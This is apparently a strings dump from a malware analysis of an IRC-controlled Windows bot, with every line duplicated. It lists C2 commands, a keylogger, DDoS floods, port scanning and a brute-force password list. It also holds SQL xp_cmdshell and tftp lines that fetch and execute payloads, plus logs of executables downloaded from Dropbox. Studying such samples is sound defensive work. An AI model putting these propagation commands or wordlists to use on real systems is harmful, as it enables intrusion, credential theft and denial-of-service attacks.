NOTICE %s :%s
[MAIN]: User %s logged out.
[MAIN]: User %s logged out.
PONG %s
PONG %s
%s Error: %s <%d>.
%s Error: %s <%d>.
explorer.exe
explorer.exe
%%comspec%% /c %s %s
%%comspec%% /c %s %s
del "%s"
del "%s"
%sdel.bat
%sdel.bat
%d.%d.%d.%d
%d.%d.%d.%d
[PING]: Finished sending pings to %s.
[PING]: Finished sending pings to %s.
[PING]: Error sending pings to %s.
[PING]: Error sending pings to %s.
[UDP]: Finished sending packets to %s.
[UDP]: Finished sending packets to %s.
[UDP]: Error sending pings to %s.
[UDP]: Error sending pings to %s.
[REDIRECT]: Failed to start client thread, error: <%d>.
[REDIRECT]: Failed to start client thread, error: <%d>.
[REDIRECT]: Client connection from IP: %s:%d, Server thread: %d.
[REDIRECT]: Client connection from IP: %s:%d, Server thread: %d.
[REDIRECT]: Failed to start connection thread, error: <%d>.
[REDIRECT]: Failed to start connection thread, error: <%d>.
[REDIRECT]: Client connection to IP: %s:%d, Server thread: %d.
[REDIRECT]: Client connection to IP: %s:%d, Server thread: %d.
PRIVMSG %s :%s
PRIVMSG %s :%s
[CMD]: Could not read data from proccess.
[CMD]: Could not read data from proccess.
[CMD]: Proccess has terminated.
[CMD]: Proccess has terminated.
[CMD]: Could not read data from proccess
[CMD]: Could not read data from proccess
[CMD]: Failed to start IO thread, error: <%d>.
[CMD]: Failed to start IO thread, error: <%d>.
[CMD]: Remote Command Prompt
[CMD]: Remote Command Prompt
cmd.exe
cmd.exe
[%s]|
[%s]|
[%d]%s
[%d]%s
[SCAN]: IP: %s Port: %d is open.
[SCAN]: IP: %s Port: %d is open.
[SCAN]: Scanning IP: %s, Port: %d.
[SCAN]: Scanning IP: %s, Port: %d.
tftp.exe -i get
tftp.exe -i get
IP: %s
IP: %s
[TFTP]: Failed to open file: %s.
[TFTP]: Failed to open file: %s.
[TFTP]: Error: socket() failed, returned: <%d>.
[TFTP]: Error: socket() failed, returned: <%d>.
%s: No %s thread found.
%s: No %s thread found.
%s: %s stopped. (%d thread(s) stopped.)
%s: %s stopped. (%d thread(s) stopped.)
[VISIT]: Failed to connect to HTTP server.
[VISIT]: Failed to connect to HTTP server.
[VISIT]: Invalid URL.
[VISIT]: Invalid URL.
[VISIT]: Failed to get requested URL from HTTP server.
[VISIT]: Failed to get requested URL from HTTP server.
[VISIT]: URL visited.
[VISIT]: URL visited.
zcÁ
zcÁ
[07-30-2014 01:50:55] [DOWNLOAD]: Opened: C:/windows/systemj.exe.
[07-30-2014 01:50:55] [DOWNLOAD]: Opened: C:/windows/systemj.exe.
s/systemj.exe @ 195.8 KB/sec.
s/systemj.exe @ 195.8 KB/sec.
exe?dl=1 to: C:/windows/system.e[07-30-2014 01:50:54] [DOWNLOAD]: Opened: C:/windows/system.exe.
exe?dl=1 to: C:/windows/system.e[07-30-2014 01:50:54] [DOWNLOAD]: Opened: C:/windows/system.exe.
[07-30-2014 01:50:54] [DOWNLOAD]: Downloaded 587.5 KB to C:/windows/systemj.exe @ 195.8 KB/sec.
[07-30-2014 01:50:54] [DOWNLOAD]: Downloaded 587.5 KB to C:/windows/systemj.exe @ 195.8 KB/sec.
[07-30-2014 01:50:53] [DOWNLOAD]: Downloaded 482.3 KB to C:/windows/system.exe @ 241.2 KB/sec.
[07-30-2014 01:50:53] [DOWNLOAD]: Downloaded 482.3 KB to C:/windows/system.exe @ 241.2 KB/sec.
[07-30-2014 01:50:46] [MAIN]: Joined channel: #fkyou#.
[07-30-2014 01:50:46] [MAIN]: Joined channel: #fkyou#.
[07-30-2014 01:50:46] [DOWNLOAD]: Downloading URL: http://www.dropbox.com/s/eniahgllsch8thw/rep.exe?dl=1 to: C:/windows/system.
[07-30-2014 01:50:46] [DOWNLOAD]: Downloading URL: http://www.dropbox.com/s/eniahgllsch8thw/rep.exe?dl=1 to: C:/windows/system.
[07-30-2014 01:50:45] [MAIN]: Joined channel: #Security-Check.
[07-30-2014 01:50:45] [MAIN]: Joined channel: #Security-Check.
[07-30-2014 01:50:45] [DOWNLOAD]: Downloading URL: http://www.dropbox.com/s/yec4ibud71nzl4k/120.exe?dl=1 to: C:/windows/systemj
[07-30-2014 01:50:45] [DOWNLOAD]: Downloading URL: http://www.dropbox.com/s/yec4ibud71nzl4k/120.exe?dl=1 to: C:/windows/systemj
[07-30-2014 01:50:45] [MAIN]: Connected to videos.p0rn-lover.us.
[07-30-2014 01:50:45] [MAIN]: Connected to videos.p0rn-lover.us.
[07-30-2014 01:50:44] [IDENTD]: Server running on Port: 113.
[07-30-2014 01:50:44] [IDENTD]: Server running on Port: 113.
DOWNLOAD]: File download: http://www.dropbox.com/s/yec4ibud71nzl4k/120.exe?dl=1 (587KB transferred).
DOWNLOAD]: File download: http://www.dropbox.com/s/yec4ibud71nzl4k/120.exe?dl=1 (587KB transferred).
emj.exe.
emj.exe.
DOWNLOAD]: File download: http://www.dropbox.com/s/eniahgllsch8thw/rep.exe?dl=1 (482KB transferred).
DOWNLOAD]: File download: http://www.dropbox.com/s/eniahgllsch8thw/rep.exe?dl=1 (482KB transferred).
em.exe.
em.exe.
%System%\pwyqire.exe
%System%\pwyqire.exe
19584375
19584375
000000009
000000009
iexplorer.exe_1652:
.text
.text
`.rdata
`.rdata
@.data
@.data
tTSSh,
tTSSh,
YYu.jWX
YYu.jWX
uDPh
uDPh
GWSSh
GWSSh
t1SSSSh
t1SSSSh
u.hpfB
u.hpfB
(msql)
(msql)
Trying: (%s:%d) user: (%s/%s).
Trying: (%s:%d) user: (%s/%s).
IP: %s
IP: %s
EXEC master..xp_cmdshell '%s'
EXEC master..xp_cmdshell '%s'
EXEC master..xp_cmdshell 'del eq&echo open %s %d >> eq&echo user %d %d >> eq &echo get %s >> eq &echo quit >> eq &ftp -n -s:eq &%s&del eq
EXEC master..xp_cmdshell 'del eq&echo open %s %d >> eq&echo user %d %d >> eq &echo get %s >> eq &echo quit >> eq &ftp -n -s:eq &%s&del eq
DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s
DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s
winpass
winpass
sqlpassoainstall
sqlpassoainstall
databasepassword
databasepassword
databasepass
databasepass
dbpassword
dbpassword
dbpass
dbpass
domainpassword
domainpassword
domainpass
domainpass
loginpass
loginpass
login
login
windows
windows
1234567890
1234567890
123456789
123456789
12345678
12345678
1234567
1234567
pass1234
pass1234
passwd
passwd
password
password
password1
password1
Windows XP (SP0 SP1)
Windows XP (SP0 SP1)
Windows NT4, 2000 (SP0-SP4)
Windows NT4, 2000 (SP0-SP4)
\\%s\pipe\browser
\\%s\pipe\browser
\\%s\ipc$
\\%s\ipc$
sqlpass
sqlpass
%s %s %s User: (%s) Pass: (%s)
%s %s %s User: (%s) Pass: (%s)
(no password)
(no password)
%s\%s\%s
%s\%s\%s
c$\windows\system32
c$\windows\system32
%s\ipc$
%s\ipc$
99999999
99999999
21122112
21122112
00000000
00000000
Password
Password
newpass
newpass
passe
passe
!@#$%^&*
!@#$%^&*
~!@#$%^&
~!@#$%^&
monkey
monkey
7654321
7654321
87654321
87654321
%systemroot%\system32\cmd.exe
%systemroot%\system32\cmd.exe
VNC%d.%d %s: %s - [NoPassword]
VNC%d.%d %s: %s - [NoPassword]
VNC%d.%d %s: %s - %s
VNC%d.%d %s: %s - %s
VNC%d.%d %s: %s - [AuthBypass]
VNC%d.%d %s: %s - [AuthBypass]
RFB d.d
RFB d.d
del eq&echo open %s %d >> eq&echo user %d %d >> eq &echo get %s >> eq &echo quit >> eq &ftp -n -s:eq &%s &del eq
del eq&echo open %s %d >> eq&echo user %d %d >> eq &echo get %s >> eq &echo quit >> eq &ftp -n -s:eq &%s &del eq
port
port
nick
nick
join
join
tftp
tftp
rndnick
rndnick
httpstop
httpstop
opencmd
opencmd
cmdstop
cmdstop
rcmd
rcmd
httpcon
httpcon
keylog
keylog
*@im.batman
*@im.batman
[%.2d-%.2d-M %.2d:%.2d:%.2d] %s
[%.2d-%.2d-M %.2d:%.2d:%.2d] %s
%s Error: %s <%d>.
%s Error: %s <%d>.
explorer.exe
explorer.exe
%s %s
%s %s
%%comspec%% /c %s %s
%%comspec%% /c %s %s
del "%s"
del "%s"
%sdel.bat
%sdel.bat
%s %s :%s
%s %s :%s
PRIVMSG
PRIVMSG
PRIVMSG %s :%s
PRIVMSG %s :%s
%s Failed to start IO thread, error %d
%s Failed to start IO thread, error %d
cmd.exe
cmd.exe
%s: %s (%s)
%s: %s (%s)
The following Windows services are registered:
The following Windows services are registered:
%s User info error: <%ld>
%s User info error: <%ld>
Units Per Week: %d
Units Per Week: %d
Max. Storage: %d
Max. Storage: %d
User's Language: %d
User's Language: %d
Country Code: %d
Country Code: %d
Workstations: %S
Workstations: %S
Logon Server: %S
Logon Server: %S
Last Logoff: %d
Last Logoff: %d
Last Logon: %d
Last Logon: %d
Number of Logins: %d
Number of Logins: %d
Bad Password Count: %d
Bad Password Count: %d
Password Age: %d
Password Age: %d
Parameters: %S
Parameters: %S
Home Directory: %S
Home Directory: %S
Auth Flags: %d
Auth Flags: %d
Privilege Level: %s
Privilege Level: %s
Comment: %S
Comment: %S
User Comment: %S
User Comment: %S
Full Name: %S
Full Name: %S
Account: %S
Account: %S
The password is shorter than required (or does not meet the password policy requirement.)
The password is shorter than required (or does not meet the password policy requirement.)
The operation is allowed only on the primary domain controller of the domain.
The operation is allowed only on the primary domain controller of the domain.
This network request is not supported.
This network request is not supported.
%s %s <Server: %S> <Message: %S></Message:></Server:>
%s %s <Server: %S> <Message: %S></Message:></Server:>
%s Message sent successfully
%s Message sent successfully
%s Not supported by this system
%s Not supported by this system
%s Unable to allocation ARP cache
%s Unable to allocation ARP cache
%s Error getting ARP cache %d
%s Error getting ARP cache %d
%s ARP cache is empty
%s ARP cache is empty
%s Error getting ARP cache %d
%s Error getting ARP cache %d
%d.%d.%d.%d
%d.%d.%d.%d
%s %s HTTP/1.1
%s %s HTTP/1.1
Referer: %s
Referer: %s
Host: %s
Host: %s
%s %s Drive (%s): %s total, %s free, %s available.
%s %s Drive (%s): %s total, %s free, %s available.
%s %s Drive (%s): Failed to stat, device not ready.
%s %s Drive (%s): Failed to stat, device not ready.
%s (%d)
%s (%d)
%s Process list failed
%s Process list failed
%s Process list completed
%s Process list completed
%s Listing processes:
%s Listing processes:
%s Netapi32.dll couldn't be loaded
%s Netapi32.dll couldn't be loaded
%s Network shares deleted
%s Network shares deleted
%s Failed to delete '%S' share.
%s Failed to delete '%S' share.
%s Share '%S' deleted.
%s Share '%S' deleted.
%s Failed to delete '%s' share.
%s Failed to delete '%s' share.
%s Share '%s' deleted.
%s Share '%s' deleted.
%s Advapi32.dll couldn't be loaded
%s Advapi32.dll couldn't be loaded
%s Failed to open IPC$ Restriction registry key
%s Failed to open IPC$ Restriction registry key
%s Restricted access to the IPC$ Share
%s Restricted access to the IPC$ Share
%s Failed to restrict access to the IPC$ Share
%s Failed to restrict access to the IPC$ Share
%s Failed to open DCOM registry key
%s Failed to open DCOM registry key
%s DCOM disabled
%s DCOM disabled
%s Disable DCOM failed
%s Disable DCOM failed
%s Network shares added
%s Network shares added
%s Failed to add '%s' share.
%s Failed to add '%s' share.
%s Share '%s' added.
%s Share '%s' added.
%s Failed to open IPC$ restriction registry key
%s Failed to open IPC$ restriction registry key
%s Unrestricted access to the IPC$ Share
%s Unrestricted access to the IPC$ Share
%s Failed to unrestrict access to the IPC$ Share
%s Failed to unrestrict access to the IPC$ Share
%s DCOM enabled
%s DCOM enabled
%s Enable DCOM failed
%s Enable DCOM failed
%s Transfer Complete On %s Executing ::(
%s Transfer Complete On %s Executing ::(
%s Error: socket() failed, returned: %d
%s Error: socket() failed, returned: %d
%s Failed to send to Remote command shell
%s Failed to send to Remote command shell
%s Failed to open remote command shell
%s Failed to open remote command shell
%s Failed to open socket
%s Failed to open socket
%s Transfer complete to IP: %s Filename: %s (%s bytes)
%s Transfer complete to IP: %s Filename: %s (%s bytes)
%s Unable to open socket
%s Unable to open socket
.DCC SEND %s %i %i %i.
.DCC SEND %s %i %i %i.
%s File doesn't exist
%s File doesn't exist
%s Failed to bind to socket
%s Failed to bind to socket
%s Failed to create socket
%s Failed to create socket
%s Transfer complete from IP: %s Filename: %s (%s bytes)
%s Transfer complete from IP: %s Filename: %s (%s bytes)
%s Socket error
%s Socket error
%s Error opening socket
%s Error opening socket
%s Error opening file for writing
%s Error opening file for writing
%s Error unable to write file to disk
%s Error unable to write file to disk
%d. %s = %s
%d. %s = %s
%s IP: %s Port: %d is open
%s IP: %s Port: %d is open
IP: %s Port: %d
IP: %s Port: %d
%s Bad URL, or DNS Error: %s
%s Bad URL, or DNS Error: %s
%s Update failed: Error executing file: %s
%s Update failed: Error executing file: %s
%s Downloaded %.1fKB to %s @ %.1fKB/sec. Updating
%s Downloaded %.1fKB to %s @ %.1fKB/sec. Updating
%s Opened: %s
%s Opened: %s
%s Downloaded %.1f KB to %s @ %.1f KB/sec.
%s Downloaded %.1f KB to %s @ %.1f KB/sec.
A%s CRC Failed (%d != %d)
A%s CRC Failed (%d != %d)
%s Filesize is incorrect: (%d != %d).
%s Filesize is incorrect: (%d != %d).
%s Update: %s (%dKB transferred)
%s Update: %s (%dKB transferred)
%s File download: %s (%dKB transferred)
%s File download: %s (%dKB transferred)
%s Couldn't open file: %s
%s Couldn't open file: %s
%s %s: No service specified
%s %s: No service specified
%s Error with service: '%s'. %s
%s Error with service: '%s'. %s
%s %s service: '%s'.
%s %s service: '%s'.
%s %s: No share specified
%s %s: No share specified
%s %s share: '%s'.
%s %s share: '%s'.
%s %s: Error with share: '%s'. %s
%s %s: Error with share: '%s'. %s
%s Share list error: %s <%ld>
%s Share list error: %s <%ld>
%s %s: No username specified
%s %s: No username specified
%s %s: Error with username: '%s'. %s
%s %s: Error with username: '%s'. %s
%s %s username: '%s'
%s %s username: '%s'
Total users found: %d.
Total users found: %d.
%s An access violation has occured
%s An access violation has occured
%s User list error: %s <%ld>
%s User list error: %s <%ld>
PRIVMSG %s :Found %s Files and %s Directories
PRIVMSG %s :Found %s Files and %s Directories
<TD WIDTH="%d"><CODE>%s</CODE></TD>
<TD WIDTH="%d"><CODE>%s</CODE></TD>
<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>
<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>
"><CODE>%s</CODE>
"><CODE>%s</CODE>
PRIVMSG %s :%-31s %-21s (%s bytes)
PRIVMSG %s :%-31s %-21s (%s bytes)
<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>
<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>
"><CODE>%s/</CODE>
"><CODE>%s/</CODE>
%s%s/
%s%s/
<TD WIDTH="%d"><A HREF="</pre><pre>PRIVMSG %s :%-31s %-21s</pre><pre>%2.2d/%2.2d/M %2.2d:%2.2d %s</pre><pre><TD COLSPAN=" 3="3"><CODE>Parent Directory</CODE></A></TD>
<TD WIDTH="%d"><A HREF="</pre><pre>PRIVMSG %s :%-31s %-21s</pre><pre>%2.2d/%2.2d/M %2.2d:%2.2d %s</pre><pre><TD COLSPAN=" 3="3"><CODE>Parent Directory</CODE></A></TD>
Searching for: %s
Searching for: %s
<TD WIDTH="%d"><CODE>Name</CODE></TD>
<TD WIDTH="%d"><CODE>Name</CODE></TD>
<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>
<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>
<TD WIDTH="%d" ALIGN="right"><CODE>Size</CODE></TD>
<TD WIDTH="%d" ALIGN="right"><CODE>Size</CODE></TD>
<H1>Index of %s</H1>
<H1>Index of %s</H1>
<TITLE>Index of %s</TITLE>
<TITLE>Index of %s</TITLE>
PRIVMSG %s :Searching for: %s
PRIVMSG %s :Searching for: %s
%s List complete.
%s List complete.
HTTP/1.0 200 OK
HTTP/1.0 200 OK
Content-Type: %s
Content-Type: %s
Date: %s %s GMT
Date: %s %s GMT
Last-Modified: %s %s GMT
Last-Modified: %s %s GMT
Expires: %s %s GMT
Expires: %s %s GMT
%s Failed to start worker thread, error %d
%s Failed to start worker thread, error %d
%s Worker thread of server thread: %d
%s Worker thread of server thread: %d
%s Error: server failed, returned %d
%s Error: server failed, returned %d
MODE %s %s
MODE %s %s
USERHOST %s
USERHOST %s
[SOCKS4]: Failed to start server thread, error: <%d>.
[SOCKS4]: Failed to start server thread, error: <%d>.
[SOCKS4]: Server started on: %s:%d.
[SOCKS4]: Server started on: %s:%d.
%s Failed to start secure thread, error %d
%s Failed to start secure thread, error %d
%s %s System
%s %s System
[DDoS]: Failed to start flood thread, error: <%d>.
[DDoS]: Failed to start flood thread, error: <%d>.
[DDoS]: Flooding: (%s:%s) for %s seconds.
[DDoS]: Flooding: (%s:%s) for %s seconds.
[SYN]: Failed to start flood thread, error: <%d>.
[SYN]: Failed to start flood thread, error: <%d>.
[SYN]: Flooding: (%s:%s) for %s seconds.
[SYN]: Flooding: (%s:%s) for %s seconds.
[ICMP]: Failed to start flood thread, error: <%d>.
[ICMP]: Failed to start flood thread, error: <%d>.
[ICMP]: Flooding: (%s) for %s seconds.
[ICMP]: Flooding: (%s) for %s seconds.
[UDP]: Failed to start flood thread, error: <%d>.
[UDP]: Failed to start flood thread, error: <%d>.
[UDP]: Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).
[UDP]: Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).
ICMP.dll not available
ICMP.dll not available
[PING]: Failed to start flood thread, error: <%d>.
[PING]: Failed to start flood thread, error: <%d>.
[PING]: Sending %d pings to %s. packet size: %d, timeout: %d(ms).
[PING]: Sending %d pings to %s. packet size: %d, timeout: %d(ms).
[TCP]: Invalid flood time must be greater than 0.
[TCP]: Invalid flood time must be greater than 0.
[TCP]: Failed to start flood thread, error: <%d>.
[TCP]: Failed to start flood thread, error: <%d>.
[TCP]: %s %s flooding: (%s:%s) for %s seconds.
[TCP]: %s %s flooding: (%s:%s) for %s seconds.
[TCP]: Invalid flood type specified.
[TCP]: Invalid flood type specified.
%s Uploading file: %s to: %s failed
%s Uploading file: %s to: %s failed
%s Uploading file: %s to: %s
%s Uploading file: %s to: %s
ftp.exe
ftp.exe
-s:%s
-s:%s
open %s
open %s
put %s
put %s
%s\%i%i%i.dll
%s\%i%i%i.dll
%s File not found: %s
%s File not found: %s
tcpflood
tcpflood
udpflood
udpflood
%s failed to start, no range specified
%s failed to start, no range specified
%s failed to start, syntax is invalid
%s failed to start, syntax is invalid
%s already %d threads. too many specified
%s already %d threads. too many specified
%s Failed to start, no range specified
%s Failed to start, no range specified
%s Failed to start, syntax is invalid
%s Failed to start, syntax is invalid
%s Failed to start thread, error: %d
%s Failed to start thread, error: %d
%s %s Method started at %s :%s for %d minutes %d delay %d threads
%s %s Method started at %s :%s for %d minutes %d delay %d threads
%s Already %d threads. Too many specified.
%s Already %d threads. Too many specified.
%s Failed to start, thread, error %d
%s Failed to start, thread, error %d
%s Started: %s:%d with delay: %d(ms)
%s Started: %s:%d with delay: %d(ms)
%s Downloading URL: %s to: %s
%s Downloading URL: %s to: %s
%s Rename: '%s' to: '%s'
%s Rename: '%s' to: '%s'
%s Couldn't execute file
%s Couldn't execute file
%s ID must be different than current running process
%s ID must be different than current running process
%s Failed to start download thread, error %d
%s Failed to start download thread, error %d
%s Downloading update from: %s
%s Downloading update from: %s
%s%s.exe
%s%s.exe
ddos.random
ddos.random
ddos.ack
ddos.ack
ddos.syn
ddos.syn
%s Repeat not allowed in command line: %s
%s Repeat not allowed in command line: %s
%s Repeat: %s
%s Repeat: %s
Mode change: %s
Mode change: %s
MODE %s
MODE %s
Action: %s: %.
Action: %s: %.
ACTION %s
ACTION %s
Privmsg: %s: %s
Privmsg: %s: %s
%s Alias added: %s
%s Alias added: %s
%s Gethost: %s
%s Gethost: %s
%s Unable to extract Gethost command
%s Unable to extract Gethost command
%s Gethost: %s , Command: %s
%s Gethost: %s , Command: %s
%s %s %s :%s
%s %s %s :%s
%s Command unknown
%s Command unknown
%s No message specified
%s No message specified
%s User list failed
%s User list failed
%s User list completed
%s User list completed
%s Share list failed
%s Share list failed
%s Share list completed
%s Share list completed
%s Service list failed
%s Service list failed
%s Service list complete.
%s Service list complete.
%s Failed to load advapi32.dll or netapi32.dll
%s Failed to load advapi32.dll or netapi32.dll
[KEYLOG]: Failed to start logging thread, error: <%d>.
[KEYLOG]: Failed to start logging thread, error: <%d>.
[KEYLOG]: Key logger active.
[KEYLOG]: Key logger active.
[KEYLOG]: Already running.
[KEYLOG]: Already running.
[KEYLOG]: No key logger thread found.
[KEYLOG]: No key logger thread found.
[KEYLOG]: Key logger stopped. (%d thread(s) stopped.)
[KEYLOG]: Key logger stopped. (%d thread(s) stopped.)
[PSNIFF]: Carnivore stopped. (%d thread(s) stopped.)
[PSNIFF]: Carnivore stopped. (%d thread(s) stopped.)
[PSNIFF]: Failed to start sniffer thread, error: <%d>.
[PSNIFF]: Failed to start sniffer thread, error: <%d>.
%s Read file failed: %s
%s Read file failed: %s
%s Read file complete: %s
%s Read file complete: %s
%s Commands: %s
%s Commands: %s
%s Error sending to remote shell
%s Error sending to remote shell
%s Command sent
%s Command sent
%s Client not open
%s Client not open
List: %s
List: %s
%s Send File: %s, User: %s
%s Send File: %s, User: %s
%s Deleted '%s'
%s Deleted '%s'
%s Failed to terminate process ID: %s
%s Failed to terminate process ID: %s
%s Process killed ID: %s
%s Process killed ID: %s
%s Failed to terminate process: %s
%s Failed to terminate process: %s
%s Process killed: %s
%s Process killed: %s
%s Couldn't resolve hostname
%s Couldn't resolve hostname
%s Lookup: %s -> %s
%s Lookup: %s -> %s
%s Server changed to: '%s'
%s Server changed to: '%s'
%s File opened: %s
%s File opened: %s
%s Prefix changed to: '%c'
%s Prefix changed to: '%c'
%s Failed to kill thread: %s
%s Failed to kill thread: %s
%s Killed thread: %s
%s Killed thread: %s
%s No active threads found
%s No active threads found
%s Stopped: %d thread(s)
%s Stopped: %d thread(s)
IRC Raw: %s
IRC Raw: %s
Parted channel: '%s'.
Parted channel: '%s'.
PART %s
PART %s
Joined channel: '%s'.
Joined channel: '%s'.
Nick changed to: '%s'.
Nick changed to: '%s'.
%s Currently %d Threads
%s Currently %d Threads
%s Crashing bot
%s Crashing bot
%s TfTp Server started on Port: %d, File: %s, Request: %s
%s TfTp Server started on Port: %d, File: %s, Request: %s
%s Already running
%s Already running
%s Failed to start server thread, error %d
%s Failed to start server thread, error %d
%s Server listening on IP: %s:%d, Directory: %s\.
%s Server listening on IP: %s:%d, Directory: %s\.
%s Failed to load dnsapi.dll
%s Failed to load dnsapi.dll
%s Failed to flush DNS cache
%s Failed to flush DNS cache
%s DNS cache flushed
%s DNS cache flushed
%s Failed to flush ARP cache
%s Failed to flush ARP cache
%s ARP cache flushed
%s ARP cache flushed
Login list complete
Login list complete
%d. %s
%d. %s
%s Remote shell ready
%s Remote shell ready
%s Couldn't open remote shell
%s Couldn't open remote shell
%s Remote shell already running
%s Remote shell already running
%s Uptime: %s
%s Uptime: %s
%s Failed to start listing thread, error %d
%s Failed to start listing thread, error %d
%s Proccess list
%s Proccess list
%s Failed to start listing thread, error %d
%s Failed to start listing thread, error %d
%s Failed to start list thread, error %d
%s Failed to start list thread, error %d
%s Bot ID: %s
%s Bot ID: %s
%s Status: Ready. Bot Uptime: %s
%s Status: Ready. Bot Uptime: %s
QUIT :%s
QUIT :%s
[TFTP]
[TFTP]
tftpstop
tftpstop
UDP flood
UDP flood
udpstop
udpstop
ddos.stop
ddos.stop
%s Invalid login slot number: %d
%s Invalid login slot number: %d
%s No user logged in at slot: %d
%s No user logged in at slot: %d
%s User %s logged out.
%s User %s logged out.
%s Random nick change: %s
%s Random nick change: %s
$rndnick
$rndnick
User: %s logged in
User: %s logged in
%s *Failed host auth by: (%s!%s)
%s *Failed host auth by: (%s!%s)
NOTICE %s :Host Auth failed (%s!%s).
NOTICE %s :Host Auth failed (%s!%s).
%s *Failed pass auth by: (%s!%s)
%s *Failed pass auth by: (%s!%s)
NOTICE %s :Your attempt has been logged.
NOTICE %s :Your attempt has been logged.
NOTICE %s :Pass auth failed (%s!%s).
NOTICE %s :Pass auth failed (%s!%s).
NOTICE %s : Password(arg) = '%s'
NOTICE %s : Password(arg) = '%s'
NOTICE %s : Password(enc) = '%s'
NOTICE %s : Password(enc) = '%s'
NOTICE %s : Password = '%s'
NOTICE %s : Password = '%s'
NOTICE %s : Password(before) = '%s'
NOTICE %s : Password(before) = '%s'
NOTICE %s : Authost = '%s'
NOTICE %s : Authost = '%s'
NOTICE %s : Nickconst = '%s'
NOTICE %s : Nickconst = '%s'
NOTICE %s : Channel = '%s'
NOTICE %s : Channel = '%s'
NOTICE %s : Server = '%s'
NOTICE %s : Server = '%s'
NOTICE %s : Version = '%s'
NOTICE %s : Version = '%s'
NOTICE %s : Id = '%s'
NOTICE %s : Id = '%s'
%s Chat failed by unauthorized user: %s
%s Chat failed by unauthorized user: %s
%s Chat already active with user: %s
%s Chat already active with user: %s
%s Failed to start chat thread, error %d
%s Failed to start chat thread, error %d
%s Chat from user: %s
%s Chat from user: %s
%s Receive file: '%s' failed from unauthorized user: %s.
%s Receive file: '%s' failed from unauthorized user: %s.
NOTICE %s :
NOTICE %s :
PING %s
PING %s
VERSION %s
VERSION %s
%s Failed to start transfer thread, error %d
%s Failed to start transfer thread, error %d
%s Receive file: '%s' from user: %s.
%s Receive file: '%s' from user: %s.
%s User: %s logged out
%s User: %s logged out
Joined channel: %s
Joined channel: %s
:%s%s
:%s%s
NICK
NICK
NOTICE %s :%s
NOTICE %s :%s
%s User %s logged out
%s User %s logged out
NICK %s
NICK %s
JOIN %s %s
JOIN %s %s
PONG %s
PONG %s
USER %s 0 0 :%s
USER %s 0 0 :%s
PASS %s
PASS %s
Connected to %s
Connected to %s
%s Bot started
%s Bot started
%s %d "%s"
%s %d "%s"
%s\%s
%s\%s
Total: %d in %s
Total: %d in %s
[%s]: %d,
[%s]: %d,
tftp -i %s get %s &%s
tftp -i %s get %s &%s
%s Scan not active.
%s Scan not active.
%s Current IP: %s
%s Current IP: %s
[FTP]: Failed to start server, error: <%d>.
[FTP]: Failed to start server, error: <%d>.
[FTP]: Server started on Port: %d, File: %s, Request: %s.
[FTP]: Server started on Port: %d, File: %s, Request: %s.
%s Failed to start server, error: <%d>.
%s Failed to start server, error: <%d>.
%s Server started on Port: %d, File: %s, Request: %s.
%s Server started on Port: %d, File: %s, Request: %s.
IP: %s, Port %d is open.
IP: %s, Port %d is open.
IP: %s:%d, Scan thread: %d, Sub-thread: %d.
IP: %s:%d, Scan thread: %d, Sub-thread: %d.
%s Finished at %s:%d after %d minute(s) of scanning.
%s Finished at %s:%d after %d minute(s) of scanning.
Failed to start worker thread, error: <%d>.
Failed to start worker thread, error: <%d>.
%s:%d, Scan thread: %d, Sub-thread: %d.
%s:%d, Scan thread: %d, Sub-thread: %d.
-[DDoS]: Send error: <%d>.
-[DDoS]: Send error: <%d>.
IP: %s (%s).
IP: %s (%s).
200 PORT command successful.
200 PORT command successful.
%s.%s.%s.%s
%s.%s.%s.%s
PORT
PORT
425 Passive not supported on this server
425 Passive not supported on this server
215 StnyFtpd
215 StnyFtpd
331 Password required
331 Password required
220 StnyFtpd 0wns j0
220 StnyFtpd 0wns j0
[ICMP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.
[ICMP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.
[ICMP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).
[ICMP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).
[ICMP]: Error: setsockopt() failed, returned: <%d>.
[ICMP]: Error: setsockopt() failed, returned: <%d>.
[ICMP]: Error: socket() failed, returned: <%d>.
[ICMP]: Error: socket() failed, returned: <%d>.
[KEYLOG]: %s
[KEYLOG]: %s
[%d-%d-%d %d:%d:%d] %s
[%d-%d-%d %d:%d:%d] %s
%s (Return) (%s)
%s (Return) (%s)
%s (Buffer full) (%s)
%s (Buffer full) (%s)
%s (Changed Windows: %s)
%s (Changed Windows: %s)
SQLDisconnect
SQLDisconnect
SQLFreeHandle
SQLFreeHandle
SQLAllocHandle
SQLAllocHandle
SQLExecDirect
SQLExecDirect
SQLSetEnvAttr
SQLSetEnvAttr
SQLDriverConnect
SQLDriverConnect
odbc32.dll
odbc32.dll
ShellExecuteA
ShellExecuteA
shell32.dll
shell32.dll
mpr.dll
mpr.dll
iphlpapi.dll
iphlpapi.dll
dnsapi.dll
dnsapi.dll
netapi32.dll
netapi32.dll
icmp.dll
icmp.dll
Mozilla/4.0 (compatible)
Mozilla/4.0 (compatible)
InternetCrackUrlA
InternetCrackUrlA
InternetOpenUrlA
InternetOpenUrlA
HttpSendRequestA
HttpSendRequestA
HttpOpenRequestA
HttpOpenRequestA
wininet.dll
wininet.dll
ws2_32.dll
ws2_32.dll
gdi32.dll
gdi32.dll
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyExA
advapi32.dll
advapi32.dll
GetKeyState
GetKeyState
GetAsyncKeyState
GetAsyncKeyState
ExitWindowsEx
ExitWindowsEx
user32.dll
user32.dll
kernel32.dll
kernel32.dll
Avicap32.dll failed. <%d>
Avicap32.dll failed. <%d>
Odbc32.dll failed. <%d>
Odbc32.dll failed. <%d>
Shell32.dll failed. <%d>
Shell32.dll failed. <%d>
Mpr32.dll failed. <%d>
Mpr32.dll failed. <%d>
Iphlpapi.dll failed. <%d>
Iphlpapi.dll failed. <%d>
Dnsapi.dll failed. <%d>
Dnsapi.dll failed. <%d>
